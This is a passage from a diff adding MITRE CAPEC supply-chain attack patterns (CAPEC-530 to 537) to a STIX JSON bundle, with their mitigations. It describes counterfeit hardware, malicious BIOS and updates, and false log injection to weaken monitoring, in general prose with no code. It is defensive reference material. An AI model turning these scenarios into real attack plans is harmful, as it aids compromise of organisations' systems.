"2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--523a56cb-eaa5-451a-8ba9-f85b37fad844", + 
"spec_version": "2.1", + "target_ref": "attack-pattern--abcb5f5a-ead2-47e3-b3cf-1e493ca049e9", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attacker provides a counterfeit component during the procurement process of a lower-tier component supplier to a sub-system developer or integrator, which is then built into the system being upgraded or repaired by the victim, allowing the attacker to cause disruption or additional compromise.", + "external_references": [ + { + "external_id": "CAPEC-530", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/530.html" + }, + { + "description": "John F. Miller, Supply Chain Attack Framework and Attack Patterns, 2013, The MITRE Corporation", + "external_id": "REF-439", + "source_name": "reference_from_CAPEC", + "url": "http://www.mitre.org/sites/default/files/publications/supply-chain-attack-framework-14-0228.pdf" + }, + { + "description": "Paul Wagner, Combating Counterfeit Components in the DoD Supply Chain, 2015, Defence Systems Information Analysis Center", + "external_id": "REF-698", + "source_name": "reference_from_CAPEC", + "url": "https://dsiac.org/articles/combating-counterfeit-components-in-the-dod-supply-chain/" + }, + { + "description": "Ujjwal Guin, Ke Huang, Daniel DiMase, John M. 
Carulli, Jr., Mohammad Tehranipoor, Yiorgos Makris, Counterfeit Integrated Circuits: A Rising Threat in the Global Semiconductor Supply Chain, Proceedings of the IEEE, 2014, IEEE", + "external_id": "REF-703", + "source_name": "reference_from_CAPEC", + "url": "https://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6856206" + } + ], + "id": "attack-pattern--b217a941-e854-468d-921b-beeba3c73a98", + "modified": "2022-02-22T00:00:00.000Z", + "name": "Provide Counterfeit Component", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--fda936c1-236d-4460-a5a9-4555d9583b2e" + ], + "x_capec_domains": [ + "Supply Chain", + "Physical Security", + "Hardware" + ], + "x_capec_example_instances": [ + "The attacker, aware that the victim has contracted with an integrator for system maintenance and that the integrator uses commercial-off-the-shelf network hubs, develops their own network hubs with a built-in malicious capability for remote access, the malicious network hubs appear to be a well-known brand of network hub but are not. The attacker then advertises to the sub-system integrator that they are a legit supplier of network hubs, and offers them at a reduced price to entice the integrator to purchase these network hubs. The integrator then installs the attacker's hubs at the victim's location, allowing the attacker to remotely compromise the victim's network." + ], + "x_capec_likelihood_of_attack": "Low", + "x_capec_prerequisites": [ + "Advanced knowledge about the target system and sub-components." + ], + "x_capec_skills_required": { + "High": "Able to develop and manufacture malicious system components that resemble legitimate name-brand components." 
+ }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "There are various methods to detect if the component is a counterfeit. See section II of [REF-703] for many techniques.", + "id": "course-of-action--270e1858-94a7-4e31-b8dc-ffc71062097e", + "modified": "2022-02-22T00:00:00.000Z", + "name": "coa-530-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--cfca2257-0ba0-43bb-92c7-3d3cb69eae5a", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--270e1858-94a7-4e31-b8dc-ffc71062097e", + "spec_version": "2.1", + "target_ref": "attack-pattern--b217a941-e854-468d-921b-beeba3c73a98", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attacker substitutes out a tested and approved hardware component for a maliciously-altered hardware component. 
This type of attack is carried out directly on the system, enabling the attacker to then cause disruption or additional compromise.", + "external_references": [ + { + "external_id": "CAPEC-531", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/531.html" + }, + { + "description": "Supply Chain Compromise: Compromise Hardware Supply Chain", + "external_id": "T1195.003", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1195/003" + } + ], + "id": "attack-pattern--fda936c1-236d-4460-a5a9-4555d9583b2e", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Hardware Component Substitution", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--a79f5cc6-781c-4e49-a00e-7aae93718f9e" + ], + "x_capec_domains": [ + "Supply Chain", + "Physical Security", + "Hardware" + ], + "x_capec_example_instances": [ + "An attacker has access to an organization's warehouse of card readers being included as a part of an overall security system. By replacing a critical hardware component in the card reader, the attacker is able to alter the function of the card reader to allow an attacker-supplied card to bypass a security checkpoint. The card reader is placed in the warehouse, and later used in the victim's security system. The attacker is then able to go to the victim and use their own card and bypass a physical security checkpoint and gain access to the victim's location for further malicious activity." + ], + "x_capec_likelihood_of_attack": "Low", + "x_capec_parent_of_refs": [ + "attack-pattern--b217a941-e854-468d-921b-beeba3c73a98", + "attack-pattern--cd81f98a-aa72-4331-a7dd-5f9cd92332e2" + ], + "x_capec_prerequisites": [ + "Physical access to the system or the integration facility where hardware components are kept." 
+ ], + "x_capec_skills_required": { + "High": "Able to develop and manufacture malicious system components that perform the same functions and processes as their non-malicious counterparts." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attacker with access to download and update system software sends a maliciously altered BIOS to the victim or victim supplier/integrator, which when installed allows for future exploitation.", + "external_references": [ + { + "external_id": "CAPEC-532", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/532.html" + }, + { + "description": "Firmware Corruption", + "external_id": "T1495", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1495" + }, + { + "description": "Pre-OS Boot:System Firmware", + "external_id": "T1542.001", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1542/001" + }, + { + "description": "John F. 
Miller, Supply Chain Attack Framework and Attack Patterns, 2013, The MITRE Corporation", + "external_id": "REF-439", + "source_name": "reference_from_CAPEC", + "url": "http://www.mitre.org/sites/default/files/publications/supply-chain-attack-framework-14-0228.pdf" + }, + { + "description": "Daniel Simpson, Dani Halfin, Andrews Mariano Gorzelany, Beth Woodbury, Supply chain attacks, 2021--10---28, Microsoft", + "external_id": "REF-716", + "source_name": "reference_from_CAPEC", + "url": "https://docs.microsoft.com/en-us/windows/security/threat-protection/intelligence/supply-chain-malware" + } + ], + "id": "attack-pattern--51d000d6-11a0-461b-98e7-8550beac027b", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Altered Installed BIOS", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--efb74200-657d-438c-aaff-bbd9644dd72d" + ], + "x_capec_domains": [ + "Supply Chain", + "Software" + ], + "x_capec_example_instances": [ + "An attacker compromises the download and update portion of a manufacturer's web presence, and develops a malicious BIOS that in addition to the normal functionality will also at a specific time of day disable the remote access subsystem's security checks. The malicious BIOS is put in place on the manufacturer's website, the victim location is sent an official-looking email informing the victim of the availability of a new BIOS with bug fixes and enhanced performance capabilities to entice the victim to install the new BIOS quickly. The malicious BIOS is downloaded and installed on the victim's system, which allows for additional compromise by the attacker." 
+ ], + "x_capec_likelihood_of_attack": "Low", + "x_capec_prerequisites": [ + "Advanced knowledge about the installed target system design.", + "Advanced knowledge about the download and update installation processes.", + "Access to the download and update system(s) used to deliver BIOS images." + ], + "x_capec_skills_required": { + "High": "Able to develop a malicious BIOS image with the original functionality as a normal BIOS image, but with added functionality that allows for later compromise and/or disruption." + }, + "x_capec_status": "Stable", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--6b8c6a8f-60bc-44b0-b941-655ac99f1ed2", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--5cd8f024-ef85-4ead-a600-9a8e45e14265", + "spec_version": "2.1", + "target_ref": "attack-pattern--51d000d6-11a0-461b-98e7-8550beac027b", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--4dba22e9-c6a9-41d4-90dc-e0f901ba07b7", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--4a4c56d3-bd9f-4a93-a13c-48bf19a739bd", + "spec_version": "2.1", + "target_ref": "attack-pattern--51d000d6-11a0-461b-98e7-8550beac027b", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--558fc16d-3a30-4de8-a6a3-715da1167d64", + "modified": "2022-09-29T00:00:00.000Z", + 
"object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--be1960df-7044-4eff-a0c2-b2bc18a0b4c2", + "spec_version": "2.1", + "target_ref": "attack-pattern--51d000d6-11a0-461b-98e7-8550beac027b", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--d87ea2ec-a2a8-4154-9e21-c6527e611602", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--f7bcda54-37c4-4cb2-867e-a93b16bf0b1c", + "spec_version": "2.1", + "target_ref": "attack-pattern--51d000d6-11a0-461b-98e7-8550beac027b", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Sign update packages and BIOS patches.", + "id": "course-of-action--01450422-3bac-46ec-874f-c608fdf422d5", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-532-4", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--5dc5f9ce-0406-4e0d-a272-ff33e485b751", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--01450422-3bac-46ec-874f-c608fdf422d5", + "spec_version": "2.1", + "target_ref": "attack-pattern--51d000d6-11a0-461b-98e7-8550beac027b", + "type": "relationship", + "x_capec_version": "3.9" + }, + { 
+ "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Use hardware security modules/trusted platform modules to verify authenticity using hardware-based cryptography.", + "id": "course-of-action--10ee6dd5-e2ac-41d7-92e2-37e1270f8598", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-532-5", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--7aadd9ce-2c81-4af1-8711-9aec554535b9", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--10ee6dd5-e2ac-41d7-92e2-37e1270f8598", + "spec_version": "2.1", + "target_ref": "attack-pattern--51d000d6-11a0-461b-98e7-8550beac027b", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attacker introduces malicious code to the victim's system by altering the payload of a software update, allowing for additional compromise or site disruption at the victim location. These manual, or user-assisted attacks, vary from requiring the user to download and run an executable, to as streamlined as tricking the user to click a URL. Attacks which aim at penetrating a specific network infrastructure often rely upon secondary attack methods to achieve the desired impact. Spamming, for example, is a common method employed as an secondary attack vector. 
Thus the attacker has in their arsenal a choice of initial attack vectors ranging from traditional SMTP/POP/IMAP spamming and its varieties, to web-application mechanisms which commonly implement both chat and rich HTML messaging within the user interface.", + "external_references": [ + { + "external_id": "CAPEC-533", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/533.html" + }, + { + "external_id": "CWE-494", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/494.html" + }, + { + "description": "Sean Endicott, Fake Microsoft update used in malicious email attack campaign, 2021--07, Microsoft News", + "external_id": "REF-710", + "source_name": "reference_from_CAPEC", + "url": "https://www.msn.com/en-us/news/technology/fake-microsoft-update-used-in-malicious-email-attack-campaign/ar-AALTcVs" + } + ], + "id": "attack-pattern--83c7d2ff-f74e-471b-bd10-28421e818719", + "modified": "2022-02-22T00:00:00.000Z", + "name": "Malicious Manual Software Update", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--3c9e7b88-a1eb-4cfd-aa34-10df08b23317" + ], + "x_capec_domains": [ + "Social Engineering", + "Supply Chain", + "Software" + ], + "x_capec_example_instances": [ + "An email campaign was initiated, targetting victims of a ransomware attack. The email claimed to be a patch to address the ransomware attack, but was instead an attachment that caused the Cobalt Strike tools to be installed, which enabled further attacks." + ], + "x_capec_likelihood_of_attack": "Low", + "x_capec_prerequisites": [ + "Advanced knowledge about the download and update installation processes.", + "Advanced knowledge about the deployed system and its various software subcomponents and processes." 
+ ], + "x_capec_skills_required": { + "High": "Able to develop malicious code that can be used on the victim's system while maintaining normal functionality." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Only accept software updates from an official source.", + "id": "course-of-action--14bd0b42-4bad-4eca-8a98-142fd83e149b", + "modified": "2022-02-22T00:00:00.000Z", + "name": "coa-533-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--2561ff45-4348-494c-9576-fa1268c134d8", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--14bd0b42-4bad-4eca-8a98-142fd83e149b", + "spec_version": "2.1", + "target_ref": "attack-pattern--83c7d2ff-f74e-471b-bd10-28421e818719", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary introduces malicious hardware during an update or replacement procedure, allowing for additional compromise or site disruption at the victim location. After deployment, it is not uncommon for upgrades and replacements to occur involving hardware and various replaceable parts. These upgrades and replacements are intended to correct defects, provide additional features, and to replace broken or worn-out parts. 
However, by forcing or tricking the replacement of a good component with a defective or corrupted component, an adversary can leverage known defects to obtain a desired malicious impact.", + "external_references": [ + { + "external_id": "CAPEC-534", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/534.html" + }, + { + "description": "John F. Miller, Supply Chain Attack Framework and Attack Patterns, 2013, The MITRE Corporation", + "external_id": "REF-439", + "source_name": "reference_from_CAPEC", + "url": "http://www.mitre.org/sites/default/files/publications/supply-chain-attack-framework-14-0228.pdf" + }, + { + "description": "Omer Shwartz, Amir Cohen, Asaf Shabtai, Yossi Oren, Shattered Trust: When Replacement Smartphone Components Attack, 11th USENIX Workshop on Offensive Technologies, 2017, USENIX", + "external_id": "REF-711", + "source_name": "reference_from_CAPEC", + "url": "https://www.usenix.org/system/files/conference/woot17/woot17-paper-shwartz.pdf" + } + ], + "id": "attack-pattern--a79f5cc6-781c-4e49-a00e-7aae93718f9e", + "modified": "2022-02-22T00:00:00.000Z", + "name": "Malicious Hardware Update", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--7fd3928c-accb-4a35-ba64-000339399ede" + ], + "x_capec_domains": [ + "Supply Chain", + "Physical Security", + "Hardware" + ], + "x_capec_example_instances": [ + "An adversary develops a malicious networking card that allows for normal function plus the addition of malicious functionality that is of benefit to the adversary. The adversary sends the victim an email stating that the existing networking card is faulty, and that the victim can order a replacement card free of charge. The victim orders the card, and the adversary sends the malicious networking card. 
The malicious networking card replaces the perfectly-functioning original networking card, and the adversary is able to take advantage of the additional malicious functionality to further compromise the victim's network." + ], + "x_capec_likelihood_of_attack": "Low", + "x_capec_parent_of_refs": [ + "attack-pattern--fda936c1-236d-4460-a5a9-4555d9583b2e", + "attack-pattern--ea2e5cbd-8278-4f8a-b56b-3cfb955d2366" + ], + "x_capec_skills_required": { + "High": "Able to develop and manufacture malicious hardware components that perform the same functions and processes as their non-malicious counterparts." + }, + "x_capec_status": "Stable", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attacker maliciously alters hardware components that will be sold on the gray market, allowing for victim disruption and compromise when the victim needs replacement hardware components for systems where the parts are no longer in regular supply from original suppliers, or where the hardware components from the attacker seems to be a great benefit from a cost perspective.", + "external_references": [ + { + "external_id": "CAPEC-535", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/535.html" + }, + { + "description": "John F. 
Miller, Supply Chain Attack Framework and Attack Patterns, 2013, The MITRE Corporation", + "external_id": "REF-439", + "source_name": "reference_from_CAPEC", + "url": "http://www.mitre.org/sites/default/files/publications/supply-chain-attack-framework-14-0228.pdf" + } + ], + "id": "attack-pattern--cd81f98a-aa72-4331-a7dd-5f9cd92332e2", + "modified": "2022-02-22T00:00:00.000Z", + "name": "Malicious Gray Market Hardware", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--fda936c1-236d-4460-a5a9-4555d9583b2e" + ], + "x_capec_domains": [ + "Supply Chain", + "Physical Security", + "Hardware" + ], + "x_capec_example_instances": [ + "An attacker develops co-processor boards with malicious capabilities that are technically the same as a manufacturer's expensive upgrade to their flagship system. The victim has installed the manufacturer's base system without the expensive upgrade. The attacker contacts the victim and states they have the co-processor boards at a drastically-reduced price, falsely stating they were acquired from a bankruptcy liquidation of a company that had purchased them from the manufacturer. The victim after hearing the drastically reduced price decides to take advantage of the situation and purchases the upgrades from the attacker, and installs them. This allows the attacker to further compromise the victim." + ], + "x_capec_likelihood_of_attack": "Low", + "x_capec_prerequisites": [ + "Physical access to a gray market reseller's hardware components supply, or the ability to appear as a gray market reseller to the victim's buyer." + ], + "x_capec_skills_required": { + "High": "Able to develop and manufacture malicious hardware components that perform the same functions and processes as their non-malicious counterparts." 
+ }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Purchase only from authorized resellers.", + "id": "course-of-action--274b7982-b465-45d9-b44b-d6c8f9b6d432", + "modified": "2022-02-22T00:00:00.000Z", + "name": "coa-535-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--d1f86bfc-be12-4ad3-92bf-99b0d177e3cc", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--274b7982-b465-45d9-b44b-d6c8f9b6d432", + "spec_version": "2.1", + "target_ref": "attack-pattern--cd81f98a-aa72-4331-a7dd-5f9cd92332e2", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Validate serial numbers from multiple sources", + "id": "course-of-action--9130946b-256a-4f1f-ac81-69e0a065710d", + "modified": "2022-02-22T00:00:00.000Z", + "name": "coa-535-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--41d1eae2-202b-4705-b213-36f908117a81", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": 
"mitigates", + "source_ref": "course-of-action--9130946b-256a-4f1f-ac81-69e0a065710d", + "spec_version": "2.1", + "target_ref": "attack-pattern--cd81f98a-aa72-4331-a7dd-5f9cd92332e2", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attacker with access to data files and processes on a victim's system injects malicious data into critical operational data during configuration or recalibration, causing the victim's system to perform in a suboptimal manner that benefits the adversary.", + "external_references": [ + { + "external_id": "CAPEC-536", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/536.html" + }, + { + "external_id": "CWE-284", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/284.html" + }, + { + "description": "John F. Miller, Supply Chain Attack Framework and Attack Patterns, 2013, The MITRE Corporation", + "external_id": "REF-439", + "source_name": "reference_from_CAPEC", + "url": "http://www.mitre.org/sites/default/files/publications/supply-chain-attack-framework-14-0228.pdf" + } + ], + "id": "attack-pattern--be032a5f-7575-4e82-86d8-6c5cabb3d9dd", + "modified": "2021-10-21T00:00:00.000Z", + "name": "Data Injected During Configuration", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--f9f65fdd-5857-4a57-a725-066465397601" + ], + "x_capec_domains": [ + "Supply Chain", + "Software" + ], + "x_capec_example_instances": [ + "An adversary wishes to bypass a security system to access an additional network segment where critical data is kept. 
The adversary knows that some configurations of the security system will allow for remote bypass under certain conditions, such as switching a specific parameter to a different value. The adversary knows the bypass will work but also will be detected within the logging data of the security system. The adversary waits until an upgrade is performed to the security system by the victim's system administrators, and the adversary has access to an external logging system. The adversary injects false log entries that cause the administrators to think there are two different error states within the security system - one involving the specific parameter and the other involving the logging entries. The specific parameter is adjusted to a different value, and the logging level is reduced to a lower level that will not cause an adversary bypass to be detected. The adversary stops injecting false log data, and the administrators of the security system believe the issues were caused by the upgrade and are now resolved. The adversary is then able to bypass the security system." + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Determine configuration process: The adversary, through a previously compromised system, either remotely or physically, determines what the configuration process is. They look at configuration files, data files, and running processes on the system to identify areas where they could inject malicious data.

  2. Determine when configuration occurs: The adversary needs to then determine when configuration or recalibration of a system occurs so they know when to inject malicious data.

  3. Techniques
    Look for a weekly update cycle or repeated update schedule.
    Insert a malicious process into the target system that notifies the adversary when configuration is occurring.

Experiment

  1. Determine malicious data to inject: By looking at the configuration process, the adversary needs to determine what malicious data they want to insert and where to insert it.

  2. Techniques
    Add false log data
    Change configuration files
    Change data files

Exploit

  1. Inject malicious data: Right before, or during system configuration, the adversary injects the malicious data. This leads to the system behaving in a way that is beneficial to the adversary and is often followed by other attacks.

", + "x_capec_likelihood_of_attack": "Low", + "x_capec_prerequisites": [ + "The attacker must have previously compromised the victim's systems or have physical access to the victim's systems.", + "Advanced knowledge of software and hardware capabilities of a manufacturer's product." + ], + "x_capec_skills_required": { + "High": "Ability to generate and inject false data into operational data into a system with the intent of causing the victim to alter the configuration of the system." + }, + "x_capec_status": "Stable", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Ensure that proper access control is implemented on all systems to prevent unauthorized access to system files and processes.", + "id": "course-of-action--5a991a71-810a-4fb9-ba49-7ad88b6ccca5", + "modified": "2021-10-21T00:00:00.000Z", + "name": "coa-536-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--bb32fca6-85ac-4fed-ab7a-d07e0bf5d9bb", + "modified": "2021-10-21T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--5a991a71-810a-4fb9-ba49-7ad88b6ccca5", + "spec_version": "2.1", + "target_ref": "attack-pattern--be032a5f-7575-4e82-86d8-6c5cabb3d9dd", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary, leveraging the ability to manipulate components of primary support systems and tools within the development 
and production environments, inserts malicious software within the hardware and/or firmware development environment. The infiltration purpose is to alter developed hardware components in a system destined for deployment at the victim's organization, for the purpose of disruption or further compromise.", + "external_references": [ + { + "external_id": "CAPEC-537", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/537.html" + }, + { + "description": "Supply Chain Compromise: Compromise Hardware Supply Chain", + "external_id": "T1195.003", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1195/003" + }, + { + "description": "John F. Miller, Supply Chain Attack Framework and Attack Patterns, 2013, The MITRE Corporation", + "external_id": "REF-439", + "source_name": "reference_from_CAPEC", + "url": "http://www.mitre.org/sites/default/files/publications/supply-chain-attack-framework-14-0228.pdf" + }, + { + "description": "Cristin Goodwin, Joram Borenstein, Guarding against supply chain attacks—Part 2: Hardware risks, 2020--02---03, Microsoft", + "external_id": "REF-712", + "source_name": "reference_from_CAPEC", + "url": "https://www.microsoft.com/security/blog/2020/02/03/guarding-against-supply-chain-attacks-part-2-hardware-risks/" + } + ], + "id": "attack-pattern--7fb3fea4-e993-49f7-8c36-d58dd5038ad8", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Infiltration of Hardware Development Environment", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": 